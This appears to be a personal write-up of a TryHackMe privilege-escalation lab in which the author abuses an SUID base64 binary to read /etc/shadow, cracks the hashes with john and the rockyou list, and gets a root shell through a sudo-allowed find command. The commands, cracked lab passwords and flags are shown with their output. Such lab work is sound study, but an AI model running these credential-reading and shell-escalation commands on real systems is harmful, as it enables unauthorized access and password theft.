OK, time to prove our worth after taking an entire course for the Jr. Pentester. Here we're going to test our privesc.
First things first, we're already SSH'd in as Leonard so we should start with a check on our sudo privlages
[leonard@ip-10-10-110-108 ~]$ sudo -l
<snip...>
Sorry, user leonard may not run sudo on ip-10-10-110-108.Ok. let's step through the course. Next step: SUID bits
[leonard@ip-10-10-110-108 ~]$ find / -type f -perm -04000 -ls 2>/dev/null
/usr/bin/base64 <-- gives SUDO, SUID
<snip...>
/usr/bin/mount <-- gives SUDO
/usr/bin/crontab <-- gives COMMAND, SUDO
/usr/bin/pkexec <-- gives SUDO
/usr/bin/at <-- gives SHELL, COMMAND, SUDO
<snip...>We'll visit GTFOBins and check out each one until we find one with an SUID bit exploit. We're trying a few here but playing with the command option of base64 as it's the only one with an SUID bit set on it.
LFILE=/etc/shadow
./base64 "$LFILE" | base64 --decodeBingo. We got the shadow file and the /etc/passwd file is readable by everyone... so we just need to save these to two different files, unshadow and let john do some crackin' for us.
unshadow passwd.txt shadow.txt > passwords.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password1 (missy)
Penny123 (leonard) And there we go. We got missy's password! We can do an su and move into that user now and read her flag.
cat /home/missy/Documents/flag1.txt
THM-42828719920544Checking sudo permissions on missy tells us she's allowed to run find as sudo.
$ sudo -l
Matching Defaults entries for missy on ip-10-10-170-36:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY
HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User missy may run the following commands on ip-10-10-170-36:
(ALL) NOPASSWD: /usr/bin/findGTFOBins says we can grab an elevated shell with this:
sudo find . -exec /bin/sh \; -quitWe run the command and find the flag:
$ sudo find . -exec /bin/sh \; -quit
sh-4.2# whoami
root
sh-4.2# cd /home/rootflag/
sh-4.2# ls -la
total 4
drwx------. 2 root root 23 Jun 7 2021 .
drwxr-xr-x. 5 root root 50 Jun 7 2021 ..
-rw-r--r--. 1 root root 20 Jun 7 2021 flag2.txt
sh-4.2# cat flag2.txt
THM-168824782390238
コメント